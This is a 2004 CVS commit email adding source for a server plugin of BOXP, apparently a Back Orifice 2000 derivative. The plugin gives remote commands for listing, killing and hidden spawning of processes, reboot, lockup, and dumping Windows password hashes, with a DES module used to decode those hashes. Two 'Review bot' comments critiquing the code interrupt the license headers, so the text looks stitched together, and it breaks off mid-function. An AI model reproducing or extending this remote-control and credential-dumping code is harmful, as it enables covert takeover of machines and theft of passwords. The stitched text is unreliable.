[Boxp-cvs] boxp/srv_system cmd_process.cpp,NONE,1.1 cmd_process.h,NONE,1.1 cmd_system.cpp,NONE,1.1 c
From: Javier A. \(RA\) <j_a...@us...> - 2004-09-10 22:00:07
Update of /cvsroot/boxp/boxp/srv_system In directory sc8-pr-cvs1.sourceforge.net:/tmp/cvs-serv14839/srv_system Added Files: cmd_process.cpp cmd_process.h cmd_system.cpp cmd_system.h deshash.cpp deshash.h dumppw.cpp dumppw.h main.cpp main.h srv_system.dsp Log Message: Initial Import Javier Aroche --- NEW FILE: main.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #include <srv_linkage.h> #include "main.h" #include "cmd_process.h" #include "cmd_system.h" // ------------- Function Implementations ------------------ HINSTANCE g_hInstance; BOOL g_bActive; int g_nCmdNum[7]; BOOL WINAPI DllMain(HINSTANCE hInst, ULONG ul_reason_for_call, LPVOID lpReserved) { // Do NOT perform configuration or initialization here switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: g_hInstance=hInst; break; } return TRUE; } bool BOAPI InitPlugin ( GS *gs, PI *pi ) { if (gs->nSize!=sizeof(GS)) return false; SRV *srv = gs->srv; g_bActive=TRUE; if ( srv ) { // Process Control g_nCmdNum[0]=srv->RegCommand(gs, CmdProc_ProcessList, NULL, "Process 
Control","List Processes",NULL,"[Remote machine]",NULL, BF_READONLY); g_nCmdNum[1]=srv->RegCommand(gs, CmdProc_ProcessKill, NULL, "Process Control","Kill Process",NULL,"Process ID",NULL, BF_READONLY); g_nCmdNum[2]=srv->RegCommand(gs, CmdProc_ProcessSpawn, NULL, "Process Control","Start Process", NULL, "0=Show, 1=Hide","Pathname and arguments",BF_WRITE); // System Commands g_nCmdNum[3]=srv->RegCommand(gs,CmdProc_SysReboot, NULL, "System","Reboot Machine",NULL,NULL,NULL, BF_WRITE); g_nCmdNum[4]=srv->RegCommand(gs,CmdProc_SysLockup, NULL, "System","Lock-up Machine",NULL,NULL,NULL, BF_WRITE); g_nCmdNum[5]=srv->RegCommand(gs,CmdProc_SysListPasswords, NULL, "System","List Passwords",NULL,NULL,NULL, BF_READONLY); g_nCmdNum[6]=srv->RegCommand(gs,CmdProc_SysInfo, NULL, "System","Get System Info",NULL,NULL,NULL, BF_READONLY); return true; } return false; } void BOAPI DelPlugin ( GS *gs ) { g_bActive=FALSE; if (gs->srv==NULL) return; for(int i=0; i<7; i++) { gs->srv->UnregCommand(gs,g_nCmdNum[i]); } } bool BOAPI PlugVer ( PLUGIN_INFO *pv ) { pv->wVerHi = 1; pv->wVerLo = 0; pv->wHiBOVer = 1; pv->wLoBOVer = 00; pv->svID = "SRVSYSTEM\0"; pv->svName = "srv_system.dll"; pv->svDesc = "BOXP System Commands"; pv->pConfigStr = NULL; pv->nConfigLen = 0; pv->bRunAsThread= false; pv->Flags = PF_SRV; pv->Type = PLG_CMD; return true; } --- NEW FILE: deshash.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
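Review bot: In InitPlugin, "Kill Process" is registered with `BF_READONLY` while "Start Process", "Reboot Machine" and "Lock-up Machine" use `BF_WRITE`. If the flag is what limits a session to read-only commands (inferred from the names; the flag definitions are not on this page), a state-changing command is reachable at the lower privilege and its registration should end `"Kill Process",NULL,"Process ID",NULL, BF_WRITE);`. "List Passwords" is also `BF_READONLY` and deserves the same look, since it returns credential material. The seven `RegCommand` results are stored unchecked, and DelPlugin later passes all seven `g_nCmdNum` slots to `UnregCommand` whether or not registration succeeded.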
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_DESHASH_H #define __INC_DESHASH_H #include<windows.h> int BOAPI DESHash_Insert(GS *gs); int BOAPI DESHash_Remove(GS *gs); void * BOAPI DESHash_Startup(GS *gs); int BOAPI DESHash_Shutdown(GS *gs, void *pInternal); int BOAPI DESHash_SetEncryptKey(GS *gs, void *pInternal, const char *svKey); int BOAPI DESHash_SetDecryptKey(GS *gs, void *pInternal, const char *svKey); char * BOAPI DESHash_GetEncryptKey(GS *gs, void *pInternal); char * BOAPI DESHash_GetDecryptKey(GS *gs, void *pInternal); BYTE * BOAPI DESHash_Encrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen); BYTE * BOAPI DESHash_Decrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen); int BOAPI DESHash_CreateNewKeys(GS *gs, void *pInternal); void BOAPI DESHash_Free(GS *gs, void *pInternal, BYTE *pBuffer); ENCRYPTION_ENGINE *GetDESHashEngine( void ); #endif --- NEW FILE: dumppw.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_DUMPPW_H #define __INC_DUMPPW_H #include <srv_linkage.h> int DumpPasswordHashes(GS *gs, BOCMD_CTX *ctx); #endif --- NEW FILE: cmd_process.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #include <srv_linkage.h> #include"main.h" #include"cmd_process.h" bool BOAPI CmdProc_ProcessList( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { FCT *fct = &gs->fct; API *api = &gs->api; char svBuffer[1024]; PROCESSINFO *pinfo,*cur; if(svArg2) if(svArg2[0]=='\0') svArg2=NULL; pinfo=fct->CreateProcListSnapshot(gs, svArg2); for(cur=pinfo;cur;cur=cur->next) { THREADINFO *pti; int nThreads; nThreads=0; for(pti=cur->pThread;pti;pti=pti->next) nThreads++; api->pwsprintf(svBuffer,"(0x%X) %s %d threads\n",cur->dwProcID,cur->svApp,nThreads); fct->IssueAuthCmdReply(gs, ctx, 0, svBuffer); } fct->IssueAuthCmdReply(gs, ctx, 0, "End process list.\n"); fct->DestroyProcListSnapshot(gs, pinfo); return 0; } bool BOAPI CmdProc_ProcessKill( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { FCT *fct = &gs->fct; API *api = &gs->api; // Get pid string (hex) char *svPid; fct->CharUpper(svArg2); svPid=fct->BreakString(svArg2,"0X", gs); if( svPid==NULL ) svPid=svArg2; // Convert to dword DWORD dwPid; dwPid=0; while(*svPid) { char c; c=*svPid; if(c>='A' && c<='F') c=c-'A'+0xA; else if(c>='0' && c<='9') c-='0'; else c=0; dwPid<<=4; dwPid|=c; svPid++; } // Open process handle HANDLE hProc; hProc=api->pOpenProcess(PROCESS_TERMINATE,FALSE,dwPid); if(hProc==NULL) { fct->IssueAuthCmdReply( gs, ctx, BCC_ERR, "Could not access process.\n" ); return false; } if(api->pTerminateProcess(hProc,0)==0) { fct->IssueAuthCmdReply( gs, ctx, BCC_ERR, "Could not terminate process.\n" ); return false; } fct->IssueAuthCmdReply( gs, ctx, 0, 
"Process terminated.\n" ); return true; } bool BOAPI CmdProc_ProcessSpawn( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { STARTUPINFO si; PROCESS_INFORMATION pi; si.cb=sizeof(STARTUPINFO); gs->fct.memset(&si,0,sizeof(STARTUPINFO)); si.dwFlags=STARTF_FORCEOFFFEEDBACK|STARTF_USESHOWWINDOW; si.wShowWindow=(nArg1==1)?SW_HIDE:SW_SHOW; HINSTANCE ShellExError; if(gs->api.pCreateProcess( NULL, svArg2, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi)==0) { ShellExError = ShellExecute(NULL, "open", svArg2, NULL, NULL, si.wShowWindow); if (int(ShellExError)<= 32) { gs->fct.IssueAuthCmdReply(gs,ctx,BCC_ERR,"Could not spawn process.\n"); return false; } } gs->fct.IssueAuthCmdReply( gs, ctx, 0, "Process spawned.\n" ); return true; } --- NEW FILE: cmd_process.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
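Review bot: CmdProc_ProcessKill maps every character that is not 0-9 or A-F to a zero nibble (`else c=0;`), so a malformed argument still yields a PID and the handler goes on to terminate whichever process owns it; the parse should fail the request instead, for example `else { fct->IssueAuthCmdReply(gs, ctx, BCC_ERR, "Invalid process ID.\n"); return false; }`. `svArg2` is passed to `CharUpper` with no NULL check, although CmdProc_ProcessList treats a NULL `svArg2` as possible. `hProc` is never closed on either the failure or the success path, so each call leaks a process handle. In CmdProc_ProcessSpawn, `si.cb` is assigned before the `memset` that clears the whole `STARTUPINFO`, so it reaches `pCreateProcess` as 0 (assuming `fct.memset` behaves like `memset`); swap the two statements, and close `pi.hProcess` and `pi.hThread` after a successful create.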
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_CMD_PROCESS_H #define __INC_CMD_PROCESS_H #include <srv_linkage.h> bool BOAPI CmdProc_ProcessList( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_ProcessKill( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_ProcessSpawn( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); #endif --- NEW FILE: srv_system.dsp --- # Microsoft Developer Studio Project File - Name="srv_system" - Package Owner=<4> # Microsoft Developer Studio Generated Build File, Format Version 6.00 # ** DO NOT EDIT ** # TARGTYPE "Win32 (x86) Dynamic-Link Library" 0x0102 CFG=srv_system - Win32 Debug !MESSAGE This is not a valid makefile. To build this project using NMAKE, !MESSAGE use the Export Makefile command and run !MESSAGE !MESSAGE NMAKE /f "srv_system.mak". !MESSAGE !MESSAGE You can specify a configuration when running NMAKE !MESSAGE by defining the macro CFG on the command line. 
For example: !MESSAGE !MESSAGE NMAKE /f "srv_system.mak" CFG="srv_system - Win32 Debug" !MESSAGE !MESSAGE Possible choices for configuration are: !MESSAGE !MESSAGE "srv_system - Win32 Release" (based on "Win32 (x86) Dynamic-Link Library") !MESSAGE "srv_system - Win32 Debug" (based on "Win32 (x86) Dynamic-Link Library") !MESSAGE # Begin Project # PROP AllowPerConfigDependencies 0 # PROP Scc_ProjName "" # PROP Scc_LocalPath "" CPP=cl.exe MTL=midl.exe RSC=rc.exe !IF "$(CFG)" == "srv_system - Win32 Release" # PROP BASE Use_MFC 0 # PROP BASE Use_Debug_Libraries 0 # PROP BASE Output_Dir "Release" # PROP BASE Intermediate_Dir "Release" # PROP BASE Target_Dir "" # PROP Use_MFC 0 # PROP Use_Debug_Libraries 0 # PROP Output_Dir "..\Exes\plugins\" # PROP Intermediate_Dir "Release" # PROP Ignore_Export_Lib 0 # PROP Target_Dir "" # ADD BASE CPP /nologo /MT /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "SRV_SYSTEM_EXPORTS" /YX /FD /c # ADD CPP /nologo /Gz /Zp1 /MT /W3 /O1 /I ".\include" /I "..\boxp\include" /I "..\bogui\include" /I "..\bocfg\include" /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "SRV_SYSTEM_EXPORTS" /FD /c # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32 # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32 # ADD BASE RSC /l 0x409 /d "NDEBUG" # ADD RSC /l 0x409 /d "NDEBUG" BSC32=bscmake.exe # ADD BASE BSC32 /nologo # ADD BSC32 /nologo LINK32=link.exe # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /machine:I386 # ADD LINK32 kernel32.lib user32.lib gdi32.lib comdlg32.lib advapi32.lib shell32.lib mpr.lib /nologo /base:"0x09480000" /entry:"DllMain@12" /dll /pdb:none /machine:I386 /def:"..\boxp\plug.def" /implib:".\Release\srv_system.lib" /opt:nowin98 # SUBTRACT LINK32 /nodefaultlib !ELSEIF "$(CFG)" == "srv_system - Win32 Debug" # PROP BASE Use_MFC 0 # PROP BASE Use_Debug_Libraries 1 # PROP BASE 
Output_Dir "Debug" # PROP BASE Intermediate_Dir "Debug" # PROP BASE Target_Dir "" # PROP Use_MFC 0 # PROP Use_Debug_Libraries 1 # PROP Output_Dir "..\Exes\plugins\" # PROP Intermediate_Dir "Debug" # PROP Ignore_Export_Lib 0 # PROP Target_Dir "" # ADD BASE CPP /nologo /MTd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "SRV_SYSTEM_EXPORTS" /YX /FD /GZ /c # ADD CPP /nologo /Gz /Zp1 /MTd /W3 /Gm /Zi /Od /I ".\include" /I "..\boxp\include" /I "..\bogui\include" /I "..\bocfg\include" /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "SRV_SYSTEM_EXPORTS" /FD /c # SUBTRACT CPP /Fr # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32 # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32 # ADD BASE RSC /l 0x409 /d "_DEBUG" # ADD RSC /l 0x409 /d "_DEBUG" BSC32=bscmake.exe # ADD BASE BSC32 /nologo # ADD BSC32 /nologo LINK32=link.exe # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /debug /machine:I386 /pdbtype:sept # ADD LINK32 kernel32.lib user32.lib gdi32.lib comdlg32.lib advapi32.lib mpr.lib shell32.lib /nologo /base:"0x09480000" /entry:"DllMain@12" /dll /incremental:no /pdb:".\Debug\_srv_system.pdb" /debug /machine:I386 /def:"..\boxp\plug.def" /out:"..\Exes\plugins\_srv_system.dll" /implib:".\Debug\_srv_system.lib" /pdbtype:sept # SUBTRACT LINK32 /pdb:none /nodefaultlib !ENDIF # Begin Target # Name "srv_system - Win32 Release" # Name "srv_system - Win32 Debug" # Begin Group "Source Files" # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat" # Begin Source File SOURCE=.\cmd_process.cpp # End Source File # Begin Source File SOURCE=.\cmd_system.cpp # End Source File # Begin Source File SOURCE=.\deshash.cpp # End Source File # Begin Source File SOURCE=.\dumppw.cpp # End Source File # Begin Source File SOURCE=.\main.cpp # End Source File # End Group # Begin Group "Header Files" # PROP Default_Filter 
"h;hpp;hxx;hm;inl" # Begin Group "support headers" # PROP Default_Filter "" # Begin Source File SOURCE=..\..\boxp\include\srv_linkage.h # End Source File # End Group # Begin Source File SOURCE=.\cmd_process.h # End Source File # Begin Source File SOURCE=.\cmd_system.h # End Source File # Begin Source File SOURCE=.\deshash.h # End Source File # Begin Source File SOURCE=.\dumppw.h # End Source File # Begin Source File SOURCE=.\main.h # End Source File # End Group # End Target # End Project --- NEW FILE: deshash.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ /* Note on DES Hashing: This module has been crippled such that it is NOT usable for encryption per United States export ITAR regulations. This module only operates on hashes for authentication, which are not regulated by ITAR. Used ONLY for decoding the internal Windows password hashes in dumppw.cpp Developer note: As this is not an encryption module, it is not coded to the standards of the CEncryptionEngine. It only uses CEncryptionEngine format as a convenience. 
*/ #include <srv_linkage.h> // ---------- Tables defined in the Data Encryption Standard documents ---------------------------- // Initial permutation IP static BYTE ip[] = { 58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8, 57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7 }; // Final permutation IP^-1 static BYTE fp[] = { 40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25 }; // permuted choice table (key) static BYTE pc1[] = { 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4 }; // number left rotations of pc1 static BYTE totrot[] = { 1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28 }; // permuted choice key (table) static BYTE pc2[] = { 14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2, 41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32 }; // The s boxes static BYTE si[8][64] = { // S1 { 14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13 }, // S2 { 15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9 }, // S3 { 10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, 1, 
10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12 }, // S4 { 7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14 }, // S5 { 2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3 }, // S6 { 12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13 }, // S7 { 4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12 }, // S8 { 13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11 } }; // 32-bit permutation function P used on the output of the S-boxes static BYTE p32i[] = { 16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10, 2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25 }; // ---- Global Variables ------------------------------------------------ ENCRYPTION_ENGINE g_DESengine={NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL}; DWORD sp[8][64]; // Combined S and P boxes BYTE iperm[16][16][8]; // Initial permutations BYTE fperm[16][16][8]; // Final permutations int bytebit[] = { 0200,0100,040,020,010,04,02,01 }; int nibblebit[] = { 010,04,02,01 }; // ---- Structures ------------------------------------------------------ typedef struct { BYTE kn[16][8]; // 8 6-bit subkeys for each of 16 initialized by des_setkey() } DESHASH_DATA; // ---- Function 
Prototypes --------------------------------------------- int BOAPI DESHash_Insert(GS *gs); int BOAPI DESHash_Remove(GS *gs); char * BOAPI DESHash_Query(void); void * BOAPI DESHash_Startup(GS *gs); int BOAPI DESHash_Shutdown(GS *gs, void *pInternal); int BOAPI DESHash_SetEncryptKey(GS *gs, void *pInternal, const char *svKey); int BOAPI DESHash_SetDecryptKey(GS *gs, void *pInternal, const char *svKey); char * BOAPI DESHash_GetEncryptKey(GS *gs, void *pInternal); char * BOAPI DESHash_GetDecryptKey(GS *gs, void *pInternal); BYTE * BOAPI DESHash_Encrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen); BYTE * BOAPI DESHash_Decrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen); int BOAPI DESHash_CreateNewKeys(GS *gs, void *pInternal); void BOAPI DESHash_Free(GS *gs, void *pInternal, BYTE *pBuffer); // ---- Function Declarations ------------------------------------------- #ifndef BIG_ENDIAN // Byte swap a long DWORD byteswap(DWORD x) { char *cp,tmp; cp = (char *)&x; tmp = cp[3]; cp[3] = cp[0]; cp[0] = tmp; tmp = cp[2]; cp[2] = cp[1]; cp[1] = tmp; return x; } #endif // ---- initialize a perm array ---- static void perminit(BYTE perm[16][16][8], BYTE p[64]) { int i,j,k,l,m; // Clear the permutation array for (i=0; i<16; i++) { for (j=0; j<16; j++) { // Clear permutation for (k=0; k<8; k++) { perm[i][j][k]=0; } // each input nibble position for (i=0; i<16; i++) { // each possible input nibble for (j = 0; j < 16; j++) { // each output bit position for (k = 0; k < 64; k++) { // where does this bit come from l = p[k] - 1; // does it come from input posn if ((l >> 2) != i) continue; // if not, bit k is 0 // any such bit in input? if (!(j & nibblebit[l & 3])) continue; // which bit is this in the byte? 
m = k & 07; perm[i][j][k>>3] |= (char)bytebit[m]; } } } } } } // ---- Initialize the lookup table for the combined S and P boxes ---- static void spinit() { BYTE pbox[32]; int p,i,s,j,rowcol; DWORD val; // Compute pbox, the inverse of p32i. // This is easier to work with for(p=0;p<32;p++){ for(i=0;i<32;i++){ if(p32i[i]-1 == p){ pbox[p] = (char)i; break; } } } // For each S-box for(s = 0; s < 8; s++) { // For each possible input for(i=0; i<64; i++) { val = 0; // The row number is formed from the first and last // bits; the column number is from the middle 4 rowcol = (i & 32) | ((i & 1) ? 16 : 0) | ((i >> 1) & 0xf); for(j=0;j<4;j++) { // For each output bit if(si[s][rowcol] & (8 >> j)){ val |= 1L << (31 - pbox[4*s + j]); } } sp[s][i] = val; } } } // permute: takes an input block, passes it through a permutation // (if desmode == 0) and returns an output block void des_permute(GS *gs, BYTE *inblock, BYTE perm[16][16][8], BYTE *outblock) { int i,j; BYTE *ib,*ob,*p,*q; // Clear Output block gs->fct.memset(outblock, 0, 8*sizeof(BYTE)); // Perform permutation ib = inblock; for (j = 0; j < 16; j += 2, ib++) { // for each input nibble ob = outblock; p = perm[j][(*ib >> 4) & 017]; q = perm[j + 1][*ib & 017]; for (i = 8; i != 0; i--){ // and each output byte *ob++ |= *p++ | *q++; // OR the masks together } } } // The nonlinear function f(r,k), the heart of DES static DWORD f(DWORD r, BYTE subkey[8]) { DWORD rval,rt; // Run E(R) ^ K through the combined S & P boxes // This code takes advantage of a convenient regularity in // E, namely that each group of 6 bits in E(R) feeding // a single S-box is a contiguous segment of R. rt = (r >> 1) | ((r & 1) ? 
0x80000000 : 0); rval = 0; rval |= sp[0][((rt >> 26) ^ *subkey++) & 0x3f]; rval |= sp[1][((rt >> 22) ^ *subkey++) & 0x3f]; rval |= sp[2][((rt >> 18) ^ *subkey++) & 0x3f]; rval |= sp[3][((rt >> 14) ^ *subkey++) & 0x3f]; rval |= sp[4][((rt >> 10) ^ *subkey++) & 0x3f]; rval |= sp[5][((rt >> 6) ^ *subkey++) & 0x3f]; rval |= sp[6][((rt >> 2) ^ *subkey++) & 0x3f]; rt = (r << 1) | ((r & 0x80000000) ? 1 : 0); rval |= sp[7][(rt ^ *subkey) & 0x3f]; return rval; } // round: Do one DES cipher round void des_round(GS *gs, int num, DWORD *block, BYTE kn[16][8]) { // The rounds are numbered from 0 to 15. On even rounds // the right half is fed to f() and the result exclusive-ORs // the left half; on odd rounds the reverse is done. if(num & 1) block[1] ^= f(block[0],kn[num]); else block[0] ^= f(block[1],kn[num]); } // In-place decryption of 64-bit block void des_dedes(GS *gs, BYTE *block, BYTE kn[16][8]) { int i; DWORD work[2], tmp; // Initial permutation des_permute(gs, block,iperm,(BYTE *)work); #ifndef BIG_ENDIAN work[0] = byteswap(work[0]); work[1] = byteswap(work[1]); #endif // Left/right half swap tmp = 